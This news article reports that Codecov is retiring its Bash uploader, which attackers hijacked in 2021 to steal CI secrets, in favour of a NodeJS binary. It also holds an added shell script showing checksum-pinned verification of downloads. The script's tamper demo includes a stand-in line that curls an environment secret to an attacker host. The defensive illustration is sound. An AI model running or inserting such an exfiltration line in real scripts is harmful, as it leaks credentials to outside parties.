Codecov to retire the Bash script responsible for supply chain attack wave
Codecov has introduced a new uploader that relies on NodeJS to replace and remove a Bash script responsible for a recent supply chain attack.
The San Francisco-based DevOps tool provider said in a blog post that the new uploader will be shipped as a static binary executable suitable for Windows, Linux, Alpine Linux, and macOS.
The new uploader, invoked in the same manner as the existing Bash uploader, pushes coverage data and updates to products during development cycles. It is currently in beta and so is yet to be fully integrated, but Codecov says that “most standard workflows that are currently accomplished with the Bash Uploader can be accomplished with the new uploader.”
Codecov’s Bash uploader was the source of a string of supply chain attacks taking place around January 31, 2021, made public on April 15.
By infiltrating Codecov’s network and hijacking the Bash uploader, the threat actors ensured that rather than pushing “healthier” code during project updates, as Codecov intends, users were instead subjected to the theft of information stored in their continuous integration (CI) environments.
According to investigators brought in after the breach was made public, the attack may also have allowed the attackers to “raid additional resources,” including credentials, potentially leading to wider network compromise in some cases.
Codecov’s range of Bash-based uploaders — the Codecov-actions uploader for GitHub, the CircleCI Orb, and the Bitrise Step — were all impacted.
The company says that with the introduction of the new uploader, all other language-specific uploaders will be deprecated, with “special attention” paid to the Bash uploader at fault.
Codecov has been working on the NodeJS uploader for eight months, originally to reduce the increasing complexity of facilitating uploads and maintenance as the Codecov customer base increased.
Now that the Bash script is tied to a severe security incident, however, the upgrade has become an urgent necessity.
“The distribution mechanism of choice (i.e., curl pipe to bash) while incredibly convenient, is notoriously problematic from a security perspective,” Codecov said. “The weaknesses of the curl | bash approach came to the forefront during [the] recent security event.”
The new uploader is now available for public use under the Beta umbrella and includes a more secure, verifiable distribution architecture, protections against unauthorized code modification, and an improved CI/CD pipeline for conducting automated testing of the uploader on Windows, Linux, and macOS.
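The weakness of `curl | bash` is that whatever the server returns is executed immediately, with no chance to check it. The following is an added illustration, not Codecov's own code, of the defensive alternative that a verifiable distribution enables: download the artifact to disk, compare its SHA-256 against a digest pinned in the CI configuration, and run it only on a match. The artifact, digest and URL here are constructed placeholders.

```shell
#!/bin/sh
# Added example (not Codecov's code): verify an uploader artifact against a
# pinned SHA-256 digest before executing it, instead of piping curl into bash.

# Portable SHA-256 of a file (sha256sum on Linux, shasum on macOS).
digest() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Returns 0 if the file's digest equals the pinned one, 1 otherwise.
verify_artifact() {
  [ "$(digest "$1")" = "$2" ]
}

# Fetch to disk, verify, then run; a mismatch deletes the file and aborts.
# The URL and PINNED_SHA256 are placeholders: the real digest would come
# from the vendor's signed release metadata and live in the CI config.
fetch_verify_run() {
  url="$1"; expected="$2"; dest="$3"; shift 3
  curl -fsSL "$url" -o "$dest" || return 2
  if verify_artifact "$dest" "$expected"; then
    chmod +x "$dest" && "$dest" "$@"
  else
    echo "checksum mismatch for $dest; refusing to execute" >&2
    rm -f "$dest"
    return 1
  fi
}

# Offline demonstration with a constructed artifact: the pinned digest
# accepts the original file and rejects a modified copy. Returns 0 on success.
demo_tamper_detection() {
  tmp=$(mktemp) || return 3
  printf 'echo "uploading coverage"\n' > "$tmp"   # constructed "uploader"
  pinned=$(digest "$tmp")                            # digest recorded at pin time
  verify_artifact "$tmp" "$pinned" || { rm -f "$tmp"; return 1; }
  printf 'curl http://attacker.invalid/$ENV_SECRET\n' >> "$tmp"  # simulated tampering
  if verify_artifact "$tmp" "$pinned"; then rm -f "$tmp"; return 1; fi
  rm -f "$tmp"
  return 0
}
```

Pinning a digest only helps if the pinned value comes from a trusted source (a signed release manifest checked out of version control), not from the same unauthenticated endpoint as the artifact.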
Codecov hopes to deprecate the Bash uploader from November, with a full sunset of the system planned for after February 1, 2022. The organization has also outlined other security improvements in the wake of the attacks.